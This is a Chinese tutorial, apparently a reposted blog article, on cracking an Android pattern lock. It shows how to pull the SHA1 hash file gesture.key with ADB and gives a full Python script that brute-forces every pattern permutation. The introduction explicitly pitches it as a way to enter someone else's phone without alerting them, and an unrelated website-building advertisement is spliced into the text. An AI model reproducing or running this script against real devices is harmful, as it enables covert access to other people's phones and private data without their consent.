安卓手機(jī)的圖形鎖是3x3的點(diǎn)陣,按次序連接數(shù)個(gè)點(diǎn)從而達(dá)到鎖定/解鎖的功能。最少需要連接4個(gè)點(diǎn),最多能連接9個(gè)點(diǎn)。網(wǎng)上也有暴力刪除手機(jī)圖形鎖的方法,即直接干掉圖形鎖功能。但假如你想進(jìn)入別人的手機(jī),但又不想引起其警覺(jué)的話(huà)……你可以參考一下本文(前提條件:手機(jī)需要root,而且打開(kāi)調(diào)試模式。一般來(lái)講,如果用過(guò)諸如“豌豆莢手機(jī)助手”、“360手機(jī)助手”一類(lèi)的軟件,都會(huì)被要求打開(kāi)調(diào)試模式的。如果要?jiǎng)h除手機(jī)內(nèi)置軟件,則需要將手機(jī)root)。
創(chuàng)新互聯(lián)-專(zhuān)業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性?xún)r(jià)比大慶網(wǎng)站開(kāi)發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式大慶網(wǎng)站制作公司更省心,省錢(qián),快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋大慶地區(qū)。費(fèi)用合理售后完善,十年實(shí)體公司更值得信賴(lài)。
首先科普一下,安卓手機(jī)是如何標(biāo)記這9個(gè)點(diǎn)的。通過(guò)閱讀安卓系統(tǒng)源碼可知,每個(gè)點(diǎn)都有其編號(hào),組成了一個(gè)3x3的矩陣,形如:
00 01 02
03 04 05
06 07 08
假如設(shè)定解鎖圖形為一個(gè)“L”形,如圖:
那么這幾個(gè)點(diǎn)的排列順序是這樣的:00 03 06 07 08。 系統(tǒng)就記下來(lái)了這一串?dāng)?shù)字,然后將這一串?dāng)?shù)字(以十六進(jìn)制的方式)進(jìn)行SHA1加密,存儲(chǔ)在了手機(jī)里的/data/system /gesture.key 文件中。我們用數(shù)據(jù)線(xiàn)連接手機(jī)和電腦,然后ADB連接手機(jī),將文件下載到電腦上(命令:adb pull /data/system/gesture.key gesture.key),如圖:
用WinHex等十六進(jìn)制編輯程序打開(kāi)gesture.key,會(huì)發(fā)現(xiàn)文件內(nèi)是SHA1加密過(guò)的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如圖:
當(dāng)你下次解鎖的時(shí)候,系統(tǒng)就對(duì)比你畫(huà)的圖案,看對(duì)應(yīng)的數(shù)字串是不是0003060708對(duì)應(yīng)的加密結(jié)果。如果是,就解鎖;不是就繼續(xù)保持鎖定。那么,如果窮舉所有的數(shù)字串排列,會(huì)有多少呢?聯(lián)想到高中的階乘,如果用4個(gè)點(diǎn)做解鎖圖形的話(huà),就是9x8x7x6=3024種可能性,那5個(gè)點(diǎn)就是15120,6個(gè)點(diǎn)的話(huà)60480,7個(gè)點(diǎn)181440,8個(gè)點(diǎn)362880,9個(gè)點(diǎn)362880。總共是985824種可能性(但這么計(jì)算并不嚴(yán)密,因?yàn)橥粭l直線(xiàn)上的點(diǎn)只能和他們相鄰的點(diǎn)相連)。滿(mǎn)打滿(mǎn)算,也不到985824種可能性。乍一看很大,但在計(jì)算機(jī)面前,窮舉出來(lái)這些東西用不了幾秒鐘。
知道了原理,就著手寫(xiě)程序來(lái)實(shí)現(xiàn)吧。這里使用了Python來(lái)完成任務(wù)。主要應(yīng)用了hashlib模塊(對(duì)字符串進(jìn)行SHA1加密)和itertools模塊(Python內(nèi)置,生成00-09的排列組合)。主要流程為:
1.ADB連接手機(jī),獲取gesture.key文件
2.讀取key文件,存入字符串str_A
3.生成全部可能的數(shù)字串
4.對(duì)這些數(shù)字串進(jìn)行加密,得到字符串str_B
5.將字符串str_A與str_B進(jìn)行對(duì)比
6.如果字符串A,B相同,則說(shuō)明數(shù)字串num就是想要的解鎖順序
7.打印出數(shù)字串num
代碼如下:
# -*- coding: cp936 -*- import itertools import hashlib import time import os #調(diào)用cmd,ADB連接到手機(jī),讀取SHA1加密后的字符串 os.system("adb pull /data/system/gesture.key gesture.key") time.sleep(5) f=open('gesture.key','r') pswd=f.readline() f.close() pswd_hex=pswd.encode('hex') print '加密后的密碼為:%s'%pswd_hex #生成解鎖序列,得到['00','01','02','03','04','05','06','07','08'] matrix=[] for i in range(0,9): str_temp = '0'+str(i) matrix.append(str_temp) #將00——08的字符進(jìn)行排列,至少取4個(gè)數(shù)排列,最多全部進(jìn)行排列 min_num=4 max_num=len(matrix) for num in range(min_num,max_num+1):#從04 -> 08 iter1 = itertools.permutations(matrix,num)#從9個(gè)數(shù)字中挑出n個(gè)進(jìn)行排列 list_m=[] list_m.append(list(iter1))#將生成的排列全部存放到 list_m 列表中 for el in list_m[0]:#遍歷這n個(gè)數(shù)字的全部排列 strlist=''.join(el)#將list轉(zhuǎn)換成str。[00,03,06,07,08]-->0003060708 strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字符串進(jìn)行SHA1加密 if pswd_hex==strlist_sha1:#將手機(jī)文件里的字符串與加密字符串進(jìn)行對(duì)比 print '解鎖密碼為:',strlist
按說(shuō)得到解鎖密碼后,應(yīng)該break跳出循環(huán)的。但Python沒(méi)有跳出多重循環(huán)的語(yǔ)句,本想設(shè)置標(biāo)志位然后不停進(jìn)行判定,為了運(yùn)行速度就免去了這個(gè)步驟(有沒(méi)有更好的實(shí)現(xiàn)跳出多重循環(huán)的方法?)。另外也略去了很多容錯(cuò)語(yǔ)句。
總結(jié)
以上就是本文關(guān)于基于Python的Android圖形解鎖程序詳解的全部?jī)?nèi)容,希望對(duì)大家有所幫助。感興趣的朋友可以繼續(xù)參閱本站其他相關(guān)專(zhuān)題,如有不足之處,歡迎留言指出。感謝朋友們對(duì)本站的支持!